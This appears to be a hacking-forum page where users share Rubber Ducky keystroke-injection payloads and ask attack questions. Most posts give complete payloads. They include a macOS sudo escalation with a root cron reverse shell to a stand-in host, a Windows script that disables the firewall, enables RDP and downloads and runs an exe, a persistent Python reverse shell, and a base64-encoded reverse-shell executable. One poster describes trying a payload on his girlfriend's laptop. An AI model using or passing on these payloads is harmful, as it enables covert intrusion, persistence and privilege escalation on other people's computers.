Search the Community

Sometime when you need to map networks, for example when you gain access to a LAN server without security tools on it, it can be useful to retrieve reverses dns for a specified internal PI. You can do it directly in bash with this short command line (example for 192.168.1.0/24) : seq 1 254 |xargs -I{} -n 1 host 192.168.1.{} It also works fine on a public PI of course. Don't hesitate to share your tips too :) -- Christophe Casalegno https://twitter.com/Brain0verride

Hello. I am getting the following error when running the reverse shell script: c:\decoder.vbs(2, 179) Microsoft VBScript compilation error: Expected integer constant I tried it on Windows 7 and 10 with the same result. Here is the script I am using: And here is the screen output: Any help would be much appreciated! Thanks in advance.

Hi! I'm new to the Rubber Ducky and to this community. I've made a simple payload to create a reverse bash in an OS X target by using crontab. I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session. Anyway, this is my payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q What this does is: Open the terminal Magically grant sudo privileges (many thanks to V3sth4cks153 for this) Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP) Remove the newly added privileges to the current user in /etc/sudoers Close the terminal app The whole execution takes around 5 seconds. So now, all we have to do in our attacking machine is: sudo nc -l -p 443 We wait one minute (max) and we're in with root privileges Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it. Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want. I just tested it on my girlfriend's Macbook Air and it works flawlessly. One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this? Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect. Hope you like it!

Hello everyone! Super new here and have started going through some metasploit tutorials. Of course I have managed to run into an issue that I have not seen any tutorial run into. After I set my RHOST and RPORT and exploit it it sits at [*] Started reverse double handler And then goes back to the regular msf command line. I have attempted this attack from my laptop to the VM running on my desktop of metasploitable, as well as from the VM Kali linux running on my desktop, both results were the exact same. Does anyone have any idea where I should start? I have attached a file of what I am stuck looking at.

This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D ****************************************************************************************************************************** DELAY 5000 ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 700 ALT Y DELAY 800 ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ENTER DELAY 300 STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f ENTER DELAY 300 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'" ENTER STRING exit ENTER ****************************************************************************************************************************** You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above. Then in terminal type the following 2 commands: cd /usr/share/ducky/encoder (for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in) java -jar encoder.jar -i payload.txt -o inject.bin (now place the "inject.bin" file on your ducky and use as you normally would)

Hi all, Here are my first additions to this community (after owning the Duck for two days!) I've created a pull request for the simple duck payload generator by skysploit if you wish to clone my repository and try these in the simple-ducky environment. https://github.com/kidovate/simple-ducky/commit/496786541282825b9c2034f06b7a57469434281d First of all, a new MAC OS X payload based on python (much more reliable!) REM Mac OSX Rev by Christian Stewart (@kidovate) GUI SPACE DELAY 500 STRING terminal DELAY 400 ENTER DELAY 1000 STRING cd ~ ENTER STRING mkdir .maintScripts ENTER STRING cd .maintScripts ENTER STRING echo "while true; do sleep 5 && python -c 'import socket,subprocess,os; STRING s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); STRING s.connect((\"attackerip\",attackerport)); STRING os.dup2(s.fileno(),0); STRING os.dup2(s.fileno(),1); STRING os.dup2(s.fileno(),2); STRING p=subprocess.call([\"/bin/sh\",\"-i\"]);'; done" > script.sh ENTER STRING chmod +rwx script.sh ENTER STRING launchctl submit -l someName -p ~/.maintScripts/script.sh ENTER STRING ./script.sh& ENTER STRING exit ENTER be sure to replace "attackerip" with your IP and "attackerport" with your port. To receive your shell, run ncat -vl attackerport ... with your port replacing "attackerport" of course. I have also added a "download JAR and execute" option to the windows part of skysploit's code.

/etc/sysctl.conf ##############################################################3 # Functions previously found in netbase # # Uncomment the next two lines to enable Spoof protection (reverse-path filter) # Turn on Source Address Verification in all interfaces to # prevent some spoofing attacks #net.ipv4.conf.default.rp_filter=1 #net.ipv4.conf.all.rp_filter=1 This is in the backtrack "/etc/sysctl.conf" So why this option give to us? what is the reverse-path filter? Are you think This option is most important to hide my ID? Help me...

I was noticing how there are many ways to defrag a hard drive today but not one way to fragment it. Basically like taking the windows defrag program and kicking it into reverse. I know there has to be a way to do it to use to slow down a systems proformance mainly just for fun or as a prank. Imagine someone going to anaylise a hard drive and see nothing but red fragmentation lol. I was wondering if there was a way to not use the systems ram so everything would get dumped over to the hard drive which yes would thrash it a bit but would be a solution. The other is just to mod the defrag program itself and change it to make your hard drive look like the files were thrown into a blender and set on liquify.

Guys, I take no credit for this payload.... I just took an already working payload and made some minor tweeks (the way the command prompt is opened) to make more it reliable for my personal use. The original code can be found here; https://securepla.net/download/ducky.txt DELAY 600 ESCAPE ESCAPE DELAY 400 WINDOWS R DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING c:\reverse.exe 172.16.1.7 4444 ENTER STRING exit ENTER

Hey everyone! I tried the Reverse Shell payload on a computer running Windows 7 x64 and Kaspersky 2012. Everything was going well up until the binary was compiled. Kaspersky was able to detect it and clean it!! Anyone else run into this issue?